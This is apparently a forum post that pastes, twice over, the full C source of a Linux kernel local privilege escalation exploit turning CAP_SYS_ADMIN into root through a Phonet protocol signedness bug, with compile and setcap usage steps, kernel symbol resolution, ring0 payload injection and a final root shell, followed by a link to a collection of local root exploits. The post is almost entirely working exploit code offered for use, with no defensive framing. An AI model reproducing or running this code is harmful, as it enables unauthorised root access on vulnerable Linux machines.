It looks like you're new here. If you want to get involved, click one of these buttons!
/*
* Linux Kernel CAP_SYS_ADMIN to root exploit
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc -w caps-to-root.c -o caps-to-root
* sudo setcap cap_sys_admin+ep caps-to-root
* ./caps-to-root
*
* This exploit is NOT stable:
*
* * It only works on 32-bit x86 machines
*
* * It only works on >= 2.6.34 kernels (it could probably be ported back, but
* it involves winning a race condition)
*
* * It requires symbol support for symbols that aren't included by default in
* several distributions
*
* * It requires the Phonet protocol, which may not be compiled on some
* distributions
*
* * You may experience problems on multi-CPU systems
*
* It has been tested on a stock Ubuntu 10.10 installation. I wouldn't be
* surprised if it doesn't work on other distributions.
*
* ----
*
* Lately there's been a lot of talk about how a large subset of Linux
* capabilities are equivalent to root. CAP_SYS_ADMIN is a catch-all
* capability that, among other things, allows mounting filesystems and
* injecting commands into an administrator's shell - in other words, it
* trivially allows you to get root. However, I found another way to get root
* from CAP_SYS_ADMIN...the hard way.
*
* This exploit leverages a signedness error in the Phonet protocol. By
* specifying a negative protocol index, I can craft a series of fake
* structures in userspace and cause the incrementing of an arbitrary kernel
* address, which I then leverage to execute arbitrary kernel code.
*
* Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth,
* and bla.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <linux/capability.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
int getroot(void)
{
commit_creds(prepare_kernel_cred(0));
return 0;
}
int konami(void)
{
/* Konami code! */
asm(\"inc %edx;\" /* UP */
\"inc %edx;\" /* UP */
\"dec %edx;\" /* DOWN */
\"dec %edx;\" /* DOWN */
\"shl %edx;\" /* LEFT */
\"shr %edx;\" /* RIGHT */
\"shl %edx;\" /* LEFT */
\"shr %edx;\" /* RIGHT */
\"push %ebx;\" /* B */
\"pop %ebx;\"
\"push %eax;\" /* A */
\"pop %eax;\"
\"mov $getroot, %ebx;\"
\"call *%ebx;\"); /* START */
return 0;
}
/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen(\"/proc/kallsyms\", \"r\");
if (f == NULL) {
f = fopen(\"/proc/ksyms\", \"r\");
if (f == NULL)
return 0;
oldstyle = 1;
}
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, \"%p %c %s\n\", (void **)&addr, &dummy, sname);
else {
ret = fscanf(f, \"%p %s\n\", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, \"_O/\") || strstr(sname, \"_S.\"))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, \"smp\", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, \"%s\n\", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, \" [+] Resolved %s to %p\n\", name, (void *)addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
int main(int argc, char * argv[])
{
int sock, proto, i, offset = -1;
unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr;
void * map;
/* Create a socket to load the module for symbol support */
printf(\"[*] Testing Phonet support and CAP_SYS_ADMIN...\n\");
sock = socket(PF_PHONET, SOCK_DGRAM, 0);
if(sock < 0) {
if(errno == EPERM)
printf(\"[*] You don't have CAP_SYS_ADMIN.\n\");
else
printf(\"[*] Failed to open Phonet socket.\n\");
return -1;
}
/* Resolve kernel symbols */
printf(\"[*] Resolving kernel symbols...\n\");
proto_tab = get_kernel_sym(\"proto_tab\");
pn_ops = get_kernel_sym(\"phonet_dgram_ops\");
pn_ioctl = get_kernel_sym(\"pn_socket_ioctl\");
commit_creds = get_kernel_sym(\"commit_creds\");
prepare_kernel_cred = get_kernel_sym(\"prepare_kernel_cred\");
if(!proto_tab || !commit_creds || !prepare_kernel_cred ||
!pn_ops || !pn_ioctl) {
printf(\"[*] Failed to resolve kernel symbols.\n\");
return -1;
}
/* Thanks bla, for reminding me how to do basic math */
landing = 0x20000000;
proto = 1 << 31 | (landing - proto_tab) >> 2;
/* Map it */
printf(\"[*] Preparing fake structures...\n\");
map = mmap((void *)landing, 0x10000,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
if(map == MAP_FAILED) {
printf(\"[*] Failed to map landing area.\n\");
return -1;
}
/* Pointer to phonet_protocol struct */
ptr = (unsigned long *)landing;
ptr[0] = &ptr[1];
/* phonet_protocol struct */
for(i = 1; i < 4; i++)
ptr[i] = &ptr[4];
/* proto struct */
for(i = 4; i < 204; i++)
ptr[i] = &ptr[204];
/* First, do a test run to calculate any offsets */
target = 0x30000000;
/* module struct */
for(i = 204; i < 404; i++)
ptr[i] = target;
/* Map it */
map = mmap((void *)0x30000000, 0x2000000,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
if(map == MAP_FAILED) {
printf(\"[*] Failed to map landing area.\n\");
return -1;
}
printf(\"[*] Calculating offsets...\n\");
socket(PF_PHONET, SOCK_DGRAM, proto);
ptr = 0x30000000;
for(i = 0; i < 0x800000; i++) {
if(ptr[i] != 0) {
offset = i * sizeof(void *);
break;
}
}
if(offset == -1) {
printf(\"[*] Test run failed.\n\");
return -1;
}
/* MSB of pn_ioctl */
target = pn_ops + 10 * sizeof(void *) - 1 - offset;
/* Re-fill the module struct */
ptr = (unsigned long *)landing;
for(i = 204; i < 404; i++)
ptr[i] = target;
/* Push pn_ioctl fptr into userspace */
printf(\"[*] Modifying function pointer...\n\");
landing = pn_ioctl;
while((landing & 0xff000000) != 0x10000000) {
socket(PF_PHONET, SOCK_DGRAM, proto);
landing += 0x01000000;
}
/* Map it */
map = mmap((void *)(landing & ~0xfff), 0x10000,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
if(map == MAP_FAILED) {
printf(\"[*] Failed to map payload area.\n\");
return -1;
}
/* Copy payload */
memcpy((void *)landing, &konami, 1024);
printf(\"[*] Executing Konami code at ring0...\n\");
ioctl(sock, 0, NULL);
if(getuid()) {
printf(\"[*] Exploit failed to get root.\n\");
return -1;
}
printf(\"[*] Konami code worked! Have a root shell.\n\");
execl(\"/bin/sh\", \"/bin/sh\", NULL);
}
/*
* Linux Kernel CAP_SYS_ADMIN to root exploit
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc -w caps-to-root.c -o caps-to-root
* sudo setcap cap_sys_admin+ep caps-to-root
* ./caps-to-root
*
* This exploit is NOT stable:
*
* * It only works on 32-bit x86 machines
*
* * It only works on >= 2.6.34 kernels (it could probably be ported back, but
* it involves winning a race condition)
*
* * It requires symbol support for symbols that aren't included by default in
* several distributions
*
* * It requires the Phonet protocol, which may not be compiled on some
* distributions
*
* * You may experience problems on multi-CPU systems
*
* It has been tested on a stock Ubuntu 10.10 installation. I wouldn't be
* surprised if it doesn't work on other distributions.
*
* ----
*
* Lately there's been a lot of talk about how a large subset of Linux
* capabilities are equivalent to root. CAP_SYS_ADMIN is a catch-all
* capability that, among other things, allows mounting filesystems and
* injecting commands into an administrator's shell - in other words, it
* trivially allows you to get root. However, I found another way to get root
* from CAP_SYS_ADMIN...the hard way.
*
* This exploit leverages a signedness error in the Phonet protocol. By
* specifying a negative protocol index, I can craft a series of fake
* structures in userspace and cause the incrementing of an arbitrary kernel
* address, which I then leverage to execute arbitrary kernel code.
*
* Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth,
* and bla.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <linux/capability.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
int getroot(void)
{
commit_creds(prepare_kernel_cred(0));
return 0;
}
int konami(void)
{
/* Konami code! */
asm(\"inc %edx;\" /* UP */
\"inc %edx;\" /* UP */
\"dec %edx;\" /* DOWN */
\"dec %edx;\" /* DOWN */
\"shl %edx;\" /* LEFT */
\"shr %edx;\" /* RIGHT */
\"shl %edx;\" /* LEFT */
\"shr %edx;\" /* RIGHT */
\"push %ebx;\" /* B */
\"pop %ebx;\"
\"push %eax;\" /* A */
\"pop %eax;\"
\"mov $getroot, %ebx;\"
\"call *%ebx;\"); /* START */
return 0;
}
/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen(\"/proc/kallsyms\", \"r\");
if (f == NULL) {
f = fopen(\"/proc/ksyms\", \"r\");
if (f == NULL)
return 0;
oldstyle = 1;
}
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, \"%p %c %s\n\", (void **)&addr, &dummy, sname);
else {
ret = fscanf(f, \"%p %s\n\", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, \"_O/\") || strstr(sname, \"_S.\"))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, \"smp\", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, \"%s\n\", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, \" [+] Resolved %s to %p\n\", name, (void *)addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
int main(int argc, char * argv[])
{
int sock, proto, i, offset = -1;
unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr;
void * map;
/* Create a socket to load the module for symbol support */
printf(\"[*] Testing Phonet support and CAP_SYS_ADMIN...\n\");
sock = socket(PF_PHONET, SOCK_DGRAM, 0);
if(sock < 0) {
if(errno == EPERM)
printf(\"[*] You don't have CAP_SYS_ADMIN.\n\");
else
printf(\"[*] Failed to open Phonet socket.\n\");
return -1;
}
/* Resolve kernel symbols */
printf(\"[*] Resolving kernel symbols...\n\");
proto_tab = get_kernel_sym(\"proto_tab\");
pn_ops = get_kernel_sym(\"phonet_dgram_ops\");
pn_ioctl = get_kernel_sym(\"pn_socket_ioctl\");
commit_creds = get_kernel_sym(\"commit_creds\");
prepare_kernel_cred = get_kernel_sym(\"prepare_kernel_cred\");
if(!proto_tab || !commit_creds || !prepare_kernel_cred ||
!pn_ops || !pn_ioctl) {
printf(\"[*] Failed to resolve kernel symbols.\n\");
return -1;
}
/* Thanks bla, for reminding me how to do basic math */
landing = 0x20000000;
proto = 1 << 31 | (landing - proto_tab) >> 2;
/* Map it */
printf(\"[*] Preparing fake structures...\n\");
map = mmap((void *)landing, 0x10000,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
if(map == MAP_FAILED) {
printf(\"[*] Failed to map landing area.\n\");
return -1;
}
/* Pointer to phonet_protocol struct */
ptr = (unsigned long *)landing;
ptr[0] = &ptr[1];
/* phonet_protocol struct */
for(i = 1; i < 4; i++)
ptr[i] = &ptr[4];
/* proto struct */
for(i = 4; i < 204; i++)
ptr[i] = &ptr[204];
/* First, do a test run to calculate any offsets */
target = 0x30000000;
/* module struct */
for(i = 204; i < 404; i++)
ptr[i] = target;
/* Map it */
map = mmap((void *)0x30000000, 0x2000000,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
if(map == MAP_FAILED) {
printf(\"[*] Failed to map landing area.\n\");
return -1;
}
printf(\"[*] Calculating offsets...\n\");
socket(PF_PHONET, SOCK_DGRAM, proto);
ptr = 0x30000000;
for(i = 0; i < 0x800000; i++) {
if(ptr[i] != 0) {
offset = i * sizeof(void *);
break;
}
}
if(offset == -1) {
printf(\"[*] Test run failed.\n\");
return -1;
}
/* MSB of pn_ioctl */
target = pn_ops + 10 * sizeof(void *) - 1 - offset;
/* Re-fill the module struct */
ptr = (unsigned long *)landing;
for(i = 204; i < 404; i++)
ptr[i] = target;
/* Push pn_ioctl fptr into userspace */
printf(\"[*] Modifying function pointer...\n\");
landing = pn_ioctl;
while((landing & 0xff000000) != 0x10000000) {
socket(PF_PHONET, SOCK_DGRAM, proto);
landing += 0x01000000;
}
/* Map it */
map = mmap((void *)(landing & ~0xfff), 0x10000,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
if(map == MAP_FAILED) {
printf(\"[*] Failed to map payload area.\n\");
return -1;
}
/* Copy payload */
memcpy((void *)landing, &konami, 1024);
printf(\"[*] Executing Konami code at ring0...\n\");
ioctl(sock, 0, NULL);
if(getuid()) {
printf(\"[*] Exploit failed to get root.\n\");
return -1;
}
printf(\"[*] Konami code worked! Have a root shell.\n\");
execl(\"/bin/sh\", \"/bin/sh\", NULL);
}
http://th3-0utl4ws.com/localroot/
That has most of them there :)